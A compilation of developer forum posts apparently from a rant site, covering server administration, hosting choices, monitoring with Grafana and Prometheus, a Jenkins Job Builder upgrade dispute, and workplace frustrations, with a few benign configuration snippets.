Live long tauri and fuck you electron.
https://tauri.studio/en/
if you’re interested.2 -
Sometime last year I had an internship at a small company.
Test servers weren't a thing; after local testing, code would go straight to production, with a backup of the files that we would put back as soon as we noticed something was broken or off.
We used Symfony, and Sonata Admin was part of the bundle.
One day, boss asks me to show all the items in a table on the admin page instead of 30 rows.
Me being the good guy intern, I said "sure, no problem", so after finding the magic number, I set it to 0 instead of 30.
I had my work reviewed by my supervisor (the senior dev there) and he approved it.
I try to upload the file over FTP. No permissions.
Ask the other dev what it's about, his response: "no idea"
So he tries, fails and decides to try SSH.
Somehow, after fiddling for 20 minutes with ssh, we managed to upload the file.
As soon as we did we hear a scream from the boss's office, we refresh the site, and no matter what page we went to, all we saw was white and the logo of the company in the top left corner.
So this time, we fiddled around with ssh to restore the file for 20 minutes.
Finally succeeded; everything went back to normal.
A little while later, we call a meeting with the bosses and ask to rewrite the website, BAM, we get approval.
We said "two weeks tops", well that lasted 3 months.
In the end the bosses were uber happy with the work and everything ended well.
Also, development speed has multiplied.
Today I charted new realms for myself.
I created a new Hyper-V VM on the company Windows servers, adding a 5th instance, but instead of running another Windows Server I installed Ubuntu 18.04 (cause I am a bit familiar with Debian from my Raspberry Pi).
We have two servers: one runs the 4 VMs, the other is a replica. I first had the new VM on the main server, but it occurred to me to move it to the unused replica machine instead. That kinda worked.. I did a planned failover, but the main server isn't configured to be the replica.. and even when activating that, it didn't work. This is weird.
For the moment I ignored that and proceeded to install nginx, MariaDB and PHP 7.2.. basically the LEMP stack. I managed to set up nginx and a static IP address for the machine (which was different from how I remembered doing it: in 18.04 it's not done in the network conf but in a YAML file).
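(For anyone hitting the same wall: the YAML file in question is netplan, which replaced the old network conf in 18.04. A static address looks roughly like this; the interface name and addresses are placeholders, and `sudo netplan apply` activates it:)

```
# /etc/netplan/01-static.yaml
network:
  version: 2
  ethernets:
    eth0:
      addresses: [192.168.1.50/24]
      gateway4: 192.168.1.1
      nameservers:
        addresses: [192.168.1.1]
```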
In the end I added two different virtual servers, one for actual use and one for dev stuff (with phpMyAdmin running, for instance), listening on port 80 and some random other port.
As a test I brought a MediaWiki onto the port 80 server and it worked.
On Monday I have to figure out how to implement the wildcard certificate I have for our company domain (internal DNS simply routes intranet.company.com to the local server VM).
I am mighty proud, cause all my experience with Linux was with a Raspberry Pi so far, and I am fairly certain I did it right and without shortcuts this time. (Unlike my Raspberry experience.)
just wanted to share
(I also sweated a lot of blood when editing the Hyper-V settings, as I did not set up the server in the first place.)
((I also installed xrdp and a MATE desktop, but I am less proud of that; sometimes seeing folders graphically helps me.))
Glad to be back on some IRC servers that managed not to die off. The ZNC bouncer has so many neat default and external plugins now; for example, you can get push notifications if you want: https://github.com/jreese/znc-push
I have worked in hosting or sysadmin roles for at least 8 years of my career and managed thousands of servers in very large environments. My team has been shopping around for a new hosting company, yet has not included me on the calls or asked for advice. The people shopping for a provider? Zero hosting experience. Zero sysadmin experience. Zero applicable experience. Not IT people, not technical. Well, I guess it's job security for when things blow up in our faces and I'll need to fix it.
Using Grafana together with tinc+Prometheus has been a blast.
Initially I wanted to get into ELK with Kibana and all that, but that required 8G of RAM, the instructions to get it running in the open source "mode" were nearly non-existent, and all the ready-made docker-compose stacks out there simply didn't work or had broken images.
I'm sure I could have worked around most of those issues, but the fact that it is as hungry as GitLab made it a literal no-go for the usual server resources my clients host, or for my own recently scaled-down server.
Thankfully I remembered that there's Grafana, and that I'd experimented with tinc some time ago, so I can have very lightweight, beats-esque Prometheus agents deployed, listening on the tinc local net only, with the typical nginx auth and some whitelists, on all of the servers I host and all those of my clients.
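(The agent side really is that lightweight; for example, Prometheus's node_exporter pinned to the tinc address so it never listens publicly. The address is a placeholder:)

```
# bind the exporter to the tinc VPN address only
./node_exporter --web.listen-address=10.42.0.3:9100
```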
The dashboard creation in Grafana was especially great (tbf, Prometheus actually does most of it); literally what I always wanted out of those "complicated" solutions that do it all but have no proper query language, complex documentation, heavy collectors with no properly named data points, expensive resource runtimes, ..
with grafana I can just easily put dashboards into folders, create users to look only at certain stats or even dashboards (opened up some interesting contracts actually, because now I can also offer proper monitoring for all things delivered), easily drag and drop around stuff to fit more information (most others fix you to a small 3x2 grid, a too big grid for a TV or simply non resizable tiles, making that one counter take up an entire row) and resize to my hearts desire
tinc of course allows me to easily create private networks that are resistant to failure across any region and the routing is done for me, so I don't have to run around it all that much either
P.S: a damn tiny fly went into one of my now 4 monitors and died right in the middle, because I thought it was just some dirt and pressed it in while trying to wipe it off, so that monitor now serves as the topmost on a VESA mount.
This is an actual transcript...
Since it's way too long for the normal 5000-character limit, I'm splitting it up...
Infra Guy: mr Dev, could you please give some rational for update of jjb?
Dev: sparse checkout support is missing
Infra Guy: is this support mandatory to achive whatever you trying to do?
Dev: yes
Infra Guy: u trying to get set of specific folder for set of specific components?
Dev: yes
Infra Guy: bash script with cp or mv will not work for you?
Dev: no
Infra Guy: ?
Dev: when you have already present functionality why reinvent the wheel
Dev: jenkins has support for it
Dev: the jjb is the bottle neck
Infra Guy: getting this functionality onto our infra would have some implications
Dev: why should I write bash script if jenkins allows me to do that
Dev: what implications ??
Infra Guy: will you commit to solve all the issues caused by new jjb?
Dev: you show me the implications first
Infra Guy: like a year ago i have tried to get new jjb <commit_url>
Infra Guy: no, the implications is a grey area
Infra Guy: i cant show all of them and they may hit like in week or eve month
Dev: then why was it not tackled
Dev: and why was it kept like that
Infra Guy: few jobs got broken on something
Dev: it will crop up some time later
Dev: if jobs get broken because of syntax
Dev: then jobs can be fixed
Dev: is it not ???
Infra Guy: ofc
Infra Guy: its just a question who will fix them
Dev: follow the syntax and follow the guidelines
Dev: put up a test server and try and lets see
Dev: you have a dev server
Dev: why not try on that one and see what all jobs fails
Dev: and why they fail
Dev: rather than saying it will fail and who will fix
Dev: let them fail and then lets find why
Dev: I manually define a job
Dev: I get it done
Infra Guy: i dont think we have test server which have the same workload and same attention as our prod
Dev: unless you test how would you know ??
Dev: and just saying that it broke one with a version hence I wont do it
Infra Guy: and im not sure if thats fair for us to deal with implication of upgrading of the major components just cause bash script is not good enough for u
Dev: its pretty bad
Infra Guy: i do agree
Infra TL Guy: Dev, what Infra Guy is saying is that its not possible to upgrade without downtime
Infra Guy: no
Dev: how long a downtime are we looking at ??
Infra Guy: im saying that after this upgrade we will have deal with consequences for long time
Infra Guy-2: No this is not testing the upgrade is the huge effort as we dont have dev resources to handle each job to run
Dev: if your jjb compiles all the yaml without error
Dev: I am not sure what consequences are we talking of
Infra Guy: so you think there will be no consequences, right?
Dev: unless you take the plunge will you know ??
Dev: you have a dev server running at port 9000
Infra Guy: this servers runs nothing
Dev: that is good
Dev: there you can take the risk
Infra Guy: and the fack we have managed to put something onto api doesnt mean it works
Dev: what API ?
Infra Guy: jenkins api
Infra Guy: hmmm
Dev: what have you put on Jenkins API ??
Infra Guy: (
Dev: jjb is a CLI
Infra Guy: ((
Dev: is what I understand
Dev: not a Jenkins API
Infra Guy: (((
Dev: (((((
Infra Guy: jjb build xmls and push them onto api
Infra Guy: and its doent matter
Dev: so you mean to say upgrading a CLI is goig to upgrade your core jenkisn API
Dev: give me a break
Infra Guy: the matter is that even if have managed to build something and put it onto api
Infra Guy: doesnt mean it will work
Dev: the API consumes the xml file and creates a job
Infra Guy: right
Dev: if it confirms to the options which it understands
Dev: then everything will work
Dev: I am actually not getting your point Infra Guy
Infra Guy: i do agree mr Dev
Dev: we are beating around the bush
Infra Guy: just want to be sure that if this upgrade will break something
Infra Guy: we will have a person who will fix it
Dev: that is what CICD is supposed to let me know with valid reasons
Dev: why can't that upgrade be done
Infra Guy: it can be done
Infra Guy: i even have commit in place
I'm trying to improve my email setup once again and need your advice. My idea is as follows:
- 2-5 users
- 1 (sub)domain per user with a catchall
- users need to be able to also send from <any>@<subdomain>.<domain>
- costs up to 1€ per user (without domain)
- provider & server not hosted in five eyes and reasonably privacy friendly
- supports standard protocols (IMAP, SMTP)
- reliable
- does not depend on me to manage it daily/weekly
- Billing/Payment for all accounts/domains at once would be nice-to-have, but not necessary
I registered a domain with wint.global the other day and I actually managed to get this to work, but unfortunately their hosting has been very underwhelming.. the server was unreachable for a few minutes yesterday not only once, but roughly once an hour, and I'd really rather be able to actually receive (and retrieve) my mail. Also their Plesk is quite slow. To be fair for their price it's more like I pay for the domain and get the hosting for free, but I digress..
I am also considering self-hosting, but realistically that means running it on a VPS and keeping it secure and patched, which I'd rather outsource to a company who can afford someone to regularly read CVEs and keep things running. I don't really want to worry about maintaining servers when I'm on holiday, for example, and while an unpatched game server is an acceptable risk, I'd rather keep my email server in good shape.
So in the end the question is: Which provider can fulfill my email dreams?
My research so far:
1. Tutanota doesn't offer standard protocols. I get their reasons, but that also makes me dependent on their service/software, which I wouldn't like. Multiple domains only on the business plans.
2. With Migadu I could easily hit their limits on incoming mail if someone signs up for too many newsletters, and I can't (and don't want to) micromanage that.
3. Strato: Unclear whether I can create mail for subdomains. Also I don't like the company for multiple reasons. However, I can access a domain hosted there and could try...
4. united-domains: Unclear whether I can create mail for subdomains.
5. posteo: No custom domains allowed.
I'm getting tired.. *sigh*
PHP dev help/advice needed!
We have problems with MySQL. Still stuck with MariaDB. I'm using indexes (correct ones) and we still have problems with scaling. We have a few tables with over 100 million rows; one of them is read every morning with a subselect that counts unique rows, and it fails every time because of a timeout/lock. The temp table size was increased, which helped for a little while, but as the table grows the problem reappears. I'm reading from a slave server that was purposely created as read-only, yet we still have problems. We're using managed dedicated servers for our hosting and they aren't willing to optimise the database configs for our needs. What are the easiest options for scaling at this point? Going fully dedicated server and Percona? NoSQL? Sharding the server? Anyone got any good blog posts or something to read about this? Your own experience?
Oh let the rant time begin…
So previous post I mentioned about this dev who has resigned and how I was going to see about a Snr. position.
Management is now scrambling to figure out what to do, as this dev managed the entire migration to AWS etc. I know servers, but I don't have much familiarity with AWS.
Anyways, I finally get a 1:1 with my new line manager. I ask about the position and he says they don't know what they're going to do yet. Maybe hire a new dev in India with the same knowledge, even though the guy leaving is in the U.K. Bad idea: the servers are in the U.K., so if we get downtime or a server crashes, we have no one in the U.K. to reset it or with access to the servers. India is very cagey about who gets access, which is annoying to say the least, even though we (three devs) in the U.K. are the principal engineering team. So they're looking at all options.
Anyways, we have a back and forth where we discuss some of the plans for the app, some of which we are nowhere near ready to even conceptualise, as the app in its current state sucks (Ruby 2.2.6 and Rails 5, but not really). It needs major refactoring and a rewrite. One thing they want to do is multi-tenancy, which, again, given the state, is laughable.
So, as my manager is speaking my head is screaming being like “this is just going to be a massive disaster”. Then we go onto that he’s seeing what everyone’s strengths are etc. And then we get onto the upgrade and that he wants me to work on it.
Yes.. the upgrade I've been trying to do for the past 4+ months, but I keep getting told to stop and getting pushed back.
I’ve been told we have devOps looking into restructuring the app, not possible as how the app is written, we have India trying to multi tenant again disaster incoming as they’ll end up rushing it. Legal are going to have a field day. Every time I say the issues are the fundamentals with the app, here’s how we can sort it. In one ear out the other basically there patching the ship even though it’s still leaking.
I have so many ideas, and things I can do to improve the app and get it back to not only working order, fix the performance issues, data issues and everything else. Brick wall.
So rants ensue where I basically say I would love to do the upgrade but management gives me no time in the roadmap (we have no say in planning). At this point I’m just speaking to a brick wall.
After the meeting I have a chat with the BAs, we all have the same issues so honestly it sucks we end up ranting to each other for an hour.
I’m being under-utilised, being told do this, do that even though I’ve had two stabs but told to stop and pushed back, I know what benefits I can bring to the app with a refactoring, ideas and how to properly lead the team because honestly we’re working on an old legacy app, and management are clueless and there priorities are all wrong, the company is getting frustrated and it’s a sinking ship. They would rather patch issues without solving them and everything I say goes in one ear and out the other.
Frustrating is not the word.
Managed to free up a shitload of disk space on our application servers, just by cleaning out old and unnecessary backup archives and obsolete versions of WPF application files. I think I did the guys at infrastructure a favour today *feeling a bit smug now*
Most of the web stuff I have done in the past has been PHP, WordPress, CGI, etc. I read about nginx and was very impressed by what it has accomplished in the last 20 years. Now I have a desire to play with this tech for fun.
What I want to do:
- create, manage, and launch minecraft servers
- provide a web interface for managing servers (I would like to learn how to make the server use the infrastructure of nginx to be managed like its other services)
- make this packaged so others can use this (probably on github)
I don't know anything about nginx other than it is really really cool, can serve massive amounts of web pages, and can do a whole lot more than that.
Question:
Is nginx suitable for this? Is this a big learning curve? Will I have fun doing this?
I am currently running a multi-instance minecraft server being managed by a piece of software called Crafty Controller. It is really neat. However, I am finding it buggy. I also see that the next version of this software will be behind a patreon. This is really disappointing. So this is spurring me to consider building something fun for myself, and if useful, for others.
I will most likely do a very barebones and inflexible web interface that just gets the job done. I know enough to get by. So I assume I have a large learning curve ahead of me.
Any advice? Is this going to turn into a large time sink?
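(For what it's worth, the nginx part I'm imagining looks like a plain reverse proxy in front of the panel, which seems to be a small learning curve. A hypothetical server block pieced together from examples; names and ports are made up:)

```
# /etc/nginx/conf.d/mc-panel.conf
server {
    listen 80;
    server_name panel.example.com;

    location / {
        proxy_pass http://127.0.0.1:8080;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
    }
}
```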
This might be a weird one or something that you're not supposed to do
I have a domain which I bought because it was very cheap, I have an old PC which I use as a server, and I have two servers on the Oracle Cloud free tier.
Now the actual question
Without shelling out for a managed DNS (which would cost more per month than I'm paying for the domain per year), is there a way I can self-host from my own server and then use the Oracle Cloud servers as fallback/failover?
All 3 machines are Ubuntu 18.04 running Apache HTTPD, if that helps.
Windows RDP, multiple sessions per user are turned on..
I always fall into one of the existing sessions, with all the crap left open by my coworkers.. I'm fuckin sick of this shit, no one closes things after they stop using the servers.. // the rant part
Is there a way to force a new session on connect? // the question part
I tried googling, but either I'm blind or don't know what to google.. I only managed to find how to connect to a specific existing session.. :/